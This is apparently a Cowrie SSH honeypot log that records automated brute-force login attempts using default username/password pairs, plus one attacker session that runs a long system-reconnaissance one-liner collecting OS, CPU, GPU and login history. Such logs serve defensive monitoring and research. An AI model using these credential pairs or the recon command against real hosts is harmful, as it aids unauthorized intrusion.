{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":39126,"dst_ip":"1.2.3.4","dst_port":22,"session":"90da6c52c273","protocol":"ssh","message":"New connection: 139.59.14.27:39126 (1.2.3.4:22) [session: 90da6c52c273]","sensor":"my-vps","timestamp":"2025-09-08T12:53:08.487422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:08.488345Z","src_ip":"139.59.14.27","session":"90da6c52c273"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:08.835118Z","src_ip":"139.59.14.27","session":"90da6c52c273"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:53:10.298465Z","src_ip":"139.59.14.27","session":"90da6c52c273"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:11.667541Z","src_ip":"139.59.14.27","session":"90da6c52c273"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":37822,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6c8d310b510","protocol":"ssh","message":"New connection: 139.59.14.27:37822 (1.2.3.4:22) [session: b6c8d310b510]","sensor":"my-vps","timestamp":"2025-09-08T12:53:12.044573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:12.045423Z","src_ip":"139.59.14.27","session":"b6c8d310b510"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:12.410373Z","src_ip":"139.59.14.27","session":"b6c8d310b510"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:53:13.904527Z","src_ip":"139.59.14.27","session":"b6c8d310b510"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:14.255470Z","src_ip":"139.59.14.27","session":"fb0c08401ac0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:14.265570Z","src_ip":"139.59.14.27","session":"b6c8d310b510"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52790,"dst_ip":"1.2.3.4","dst_port":22,"session":"532f2d5ef4b2","protocol":"ssh","message":"New connection: 212.227.235.229:52790 (1.2.3.4:22) [session: 532f2d5ef4b2]","sensor":"my-vps","timestamp":"2025-09-08T12:53:33.345661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:33.346901Z","src_ip":"212.227.235.229","session":"532f2d5ef4b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:33.646333Z","src_ip":"212.227.235.229","session":"532f2d5ef4b2"}
{"eventid":"cowrie.login.failed","username":"lenovo","password":"lenovo","message":"login attempt [lenovo/lenovo] failed","sensor":"my-vps","timestamp":"2025-09-08T12:53:34.874405Z","src_ip":"212.227.235.229","session":"532f2d5ef4b2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48848,"dst_ip":"1.2.3.4","dst_port":22,"session":"763dca96ba75","protocol":"ssh","message":"New connection: 134.199.174.250:48848 (1.2.3.4:22) [session: 763dca96ba75]","sensor":"my-vps","timestamp":"2025-09-08T12:53:36.058116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:53:36.146121Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:36.175338Z","src_ip":"212.227.235.229","session":"532f2d5ef4b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:53:36.313577Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.login.success","username":"root","password":"123abc","message":"login attempt [root/123abc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:53:37.481063Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:53:38.152592Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.153417Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.153936Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.155144Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.156848Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.157443Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.158231Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.159400Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.159887Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.160590Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.161019Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.161964Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.162321Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.418603Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.419873Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:53:38.420714Z","src_ip":"134.199.174.250","session":"763dca96ba75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56008,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f2dae5cafbd","protocol":"ssh","message":"New connection: 212.227.235.229:56008 (1.2.3.4:22) [session: 1f2dae5cafbd]","sensor":"my-vps","timestamp":"2025-09-08T12:53:59.404158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:53:59.405209Z","src_ip":"212.227.235.229","session":"1f2dae5cafbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:53:59.775923Z","src_ip":"212.227.235.229","session":"1f2dae5cafbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36066,"dst_ip":"1.2.3.4","dst_port":22,"session":"2efabfc3588b","protocol":"ssh","message":"New connection: 212.227.235.229:36066 (1.2.3.4:22) [session: 2efabfc3588b]","sensor":"my-vps","timestamp":"2025-09-08T12:54:00.363139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:00.363805Z","src_ip":"212.227.235.229","session":"2efabfc3588b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:00.498090Z","src_ip":"212.227.235.229","session":"2efabfc3588b"}
{"eventid":"cowrie.login.failed","username":"superman","password":"password123","message":"login attempt [superman/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:01.076220Z","src_ip":"212.227.235.229","session":"2efabfc3588b"}
{"eventid":"cowrie.login.failed","username":"stack","password":"123456","message":"login attempt [stack/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:01.237666Z","src_ip":"212.227.235.229","session":"1f2dae5cafbd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:02.213903Z","src_ip":"212.227.235.229","session":"2efabfc3588b"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:02.567242Z","src_ip":"212.227.235.229","session":"1f2dae5cafbd"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":33840,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c8047376ea4","protocol":"ssh","message":"New connection: 134.199.174.250:33840 (1.2.3.4:22) [session: 2c8047376ea4]","sensor":"my-vps","timestamp":"2025-09-08T12:54:08.186629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:54:08.312361Z","src_ip":"134.199.174.250","session":"2c8047376ea4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:54:08.509087Z","src_ip":"134.199.174.250","session":"2c8047376ea4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:10.160397Z","src_ip":"134.199.174.250","session":"2c8047376ea4"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:11.462823Z","src_ip":"134.199.174.250","session":"2c8047376ea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38900,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc98303f665","protocol":"ssh","message":"New connection: 212.227.235.229:38900 (1.2.3.4:22) [session: 4bc98303f665]","sensor":"my-vps","timestamp":"2025-09-08T12:54:11.836797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:11.837841Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
